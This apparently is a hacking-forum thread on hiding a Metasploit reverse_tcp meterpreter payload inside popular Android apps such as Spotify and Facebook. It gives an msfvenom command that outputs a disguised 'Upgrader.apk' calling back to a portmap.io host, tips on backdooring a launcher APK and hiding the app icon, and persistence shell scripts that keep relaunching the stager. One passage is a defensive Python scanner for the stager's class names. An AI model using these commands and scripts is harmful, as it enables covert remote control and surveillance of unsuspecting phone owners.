Forum Thread: How Can We Set a reverse_tcp Payload for Android in Any Apk File?

I've tried so many times to set a reverse_tcp payload in an apk file. I installed every piece of software that showed up in the error, for example: Java, Keytool, apktool, zipalign and jarsigner.

Command I used:
msfvenom -x facebook.apk --arch dalvik --platform Android android/meterpreter/reverse_tcp LHOST="XXXXX.portmap.io" LPORT=XXXX R -o Upgrader.apk

Error shown:
Attempting to read payload from STDIN...
No encoder or badchars specified, outputting raw payload
Payload size: 0 bytes
Saved as: Upgrader.apk

Please help!

8 Responses

Try out this command here

Will this bind my payload into an apk file, for example spotify.apk?

Nope, this isn't going to bind your reverse payload into a real working .apk file; it's just going to generate a standalone payload.

You could clone evil-droid.

Either create a msf payload, changing the name and icon. This is the best option, I think; when you get meterpreter you could use the hideappicon command, which will give you time to upload a persistence script.

Or you could backdoor an existing apk. The best option is to use the Google Now launcher; the link to download it is google-now-launcher.en.softonic.com/android

I tried this, but the persistence file is not executing.

I gave the command in the shell: sh (file name).sh

And I think it's correct; if not, please tell me. Or else maybe there is something wrong in my persistence file.

Can you share that persistence file? Or teach me how to make one. Are there different persistence files for every version of Android?

It will also be helpful if you share the error you're receiving when you run the .sh script.

Here's what I noticed when backdooring an existing apk:

For example, when you install WhatsApp, if you check the android/data folder you'll see it installed as com.whatsapp. I find that when you backdoor an apk you will not find that a com.metasploit.stage exists; correct me if I'm wrong, please.

Anyways,

because of how most Android applications are programmed today, it is very unlikely that most of them will be recompiled successfully with apktool. I haven't tested your app to see if it would recompile successfully, but the best option I found was the Google Now Launcher apk (source: HackerSploit on YouTube).

Anyways, here's my persistence.sh script for the normal Metasploit payload (without backdooring):

#!/bin/bash
while true
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

As I said, if it doesn't work it means that com.metasploit.stage does not exist.

The best option is to just create a normal payload with evil-droid and then add an icon to it. When you get meterpreter, hide the icon and run the persistence script. Install the payload on your Android first to get the com.blaa.blaa, then edit the persistence.sh file:

while true
do am start --user 0 -a android.intent.action.MAIN -n com.blaa.blaa/.MainActivity
sleep 20
done

Check out my other post on how to run the persistence script without entering the Android shell from meterpreter, through the (shell) cmd.
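On the defensive side, the package name discussed above (com.metasploit.stage with its MainActivity) is also the simplest triage indicator for an APK that carries the stock Metasploit stager. The following is an added example, not code from the thread or from any of the tools mentioned: it treats the APK as a zip, scans each classes*.dex for the stager's class descriptors, and builds a constructed stand-in APK so it runs offline. The DEX filler and the sample package names are assumptions; a stager whose package was renamed (as the thread suggests doing) will not be caught by this check.

```python
import io
import re
import zipfile

# Indicator taken from the thread above: the stock Metasploit Android stager
# registers under the package com.metasploit.stage with a MainActivity.
# Inside a DEX file, classes appear as descriptors such as
# "Lcom/metasploit/stage/MainActivity;".
STAGER_DESCRIPTOR = re.compile(rb"Lcom/metasploit/stage/[A-Za-z0-9_$/]+;")


def scan_dex_bytes(dex: bytes) -> list[str]:
    """Return every distinct Metasploit stager class descriptor found in a DEX blob."""
    return sorted({m.group(0).decode("ascii") for m in STAGER_DESCRIPTOR.finditer(dex)})


def scan_apk(apk_bytes: bytes) -> dict[str, list[str]]:
    """Scan every classes*.dex inside an APK (a zip archive) for stager descriptors.

    Returns {dex_name: [descriptors]} for the DEX files that contained a hit."""
    hits: dict[str, list[str]] = {}
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        for name in zf.namelist():
            if re.fullmatch(r"classes\d*\.dex", name):
                found = scan_dex_bytes(zf.read(name))
                if found:
                    hits[name] = found
    return hits


def build_sample_apk(backdoored: bool) -> bytes:
    """Constructed stand-in for a real APK: a zip holding a fake classes.dex.

    Real DEX files begin with the magic 'dex\\n035\\0'; everything after it here is
    filler plus a few class descriptors, enough for the string scan above."""
    dex = bytearray(b"dex\n035\x00" + b"\x00" * 64)
    dex += b"Lcom/example/app/MainActivity;\x00"  # assumed benign app class
    if backdoored:
        dex += b"Lcom/metasploit/stage/MainActivity;\x00Lcom/metasploit/stage/Payload;\x00"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("AndroidManifest.xml", b"")  # placeholder; binary XML is not parsed here
        zf.writestr("classes.dex", bytes(dex))
    return buf.getvalue()


if __name__ == "__main__":
    for label, sample in (("clean", build_sample_apk(False)), ("backdoored", build_sample_apk(True))):
        print(label, scan_apk(sample) or "no stager classes found")
```

Point `scan_apk` at the bytes of a real APK to triage it; a hit means the file still carries the unrenamed stager classes and deserves a closer look with a proper decompiler.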

Yes, I tried everything you told me. Binding the payload into Google Now Launcher is working, but binding with others like spotify.apk or any of the latest apks doesn't work. And setting a persistence file also worked, thank you.

I tried in both evil-droid and askinjector. I want to learn to bind a payload into Spotify or Lifesum or Instagram or any newer versions of applications. And to be more specific, I was trying with Spotify. I don't want to hack anyone. There is nothing which is 100% safe; there will always be a way, I just want to know how.
